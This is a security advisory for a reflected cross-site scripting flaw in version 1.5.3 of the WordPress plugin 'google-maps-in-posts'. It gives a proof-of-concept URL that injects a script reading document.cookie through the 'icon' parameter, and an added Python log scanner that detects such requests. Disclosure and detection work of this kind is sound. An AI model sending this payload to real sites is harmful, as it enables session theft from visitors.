wp-plugin : google-maps-in-posts

Plugin Details
Plugin Name: wp-plugin : google-maps-in-posts
Affected Version : 1.5.3 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://localhost/wp-content/plugins/google-maps-in-posts/icons/icon.php?icon=icon"><script>alert(document.cookie)</script>&

 

Vulnerable Parameter : icon

 

Type of XSS : Reflected
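
One way to look for requests probing this parameter in web-server logs, as an added example that is not part of the original advisory. It assumes combined-format access logs and that a legitimate icon value contains only letters, digits, `_`, `.` and `-`; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter name come from the advisory's PoC.
VULN_PATH = "/wp-content/plugins/google-maps-in-posts/icons/icon.php"
PARAM = "icon"
# Assumption: a legitimate icon name needs only these characters.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_.-]*")
# Request line of a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_icon_values(line):
    """Return the decoded icon values in one log line that fall outside the allow-list."""
    match = REQUEST.search(line)
    if not match:
        return []
    target = urlsplit(match.group(1))
    if not target.path.endswith(VULN_PATH):
        return []
    # parse_qs percent-decodes each value before the allow-list check.
    values = parse_qs(target.query).get(PARAM, [])
    return [v for v in values if not SAFE_VALUE.fullmatch(v)]


def scan(lines):
    """Return (line_number, values) for every log line with a suspicious icon value."""
    hits = []
    for number, line in enumerate(lines, start=1):
        values = suspicious_icon_values(line)
        if values:
            hits.append((number, values))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Jul/2014:10:00:01 +0000] "GET /wp-content/plugins/google-maps-in-posts/icons/icon.php?icon=marker-red HTTP/1.1" 200 512',
    '203.0.113.9 - - [07/Jul/2014:10:00:07 +0000] "GET /wp-content/plugins/google-maps-in-posts/icons/icon.php?icon=icon%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E& HTTP/1.1" 200 540',
    '203.0.113.9 - - [07/Jul/2014:10:00:09 +0000] "GET /index.php?icon=%3Cb%3E HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for number, values in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious icon value(s): {values}")
```

Because the XSS is reflected and needs no authentication, a hit in the logs shows a request that carried markup in `icon`, not that a visitor's browser executed it.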


Disclosure Timeline
Vendor Contacted : 2014-01-05
Plugin Status : Updated on
Public Disclosure : July 7, 2014
CVE Number :
Plugin Description :
Google Maps in Posts plugin for WordPress gives possibility to use Google Maps Services in your blog. That could be useful for posts in WP, describing certain locations or events, to indicate them immediately in the WP post with a map. The Google Maps Plugin gives you a simple and easy WordPress administration back end to handle multiple locations and your own location would be defined only once for all the maps of your WP blog.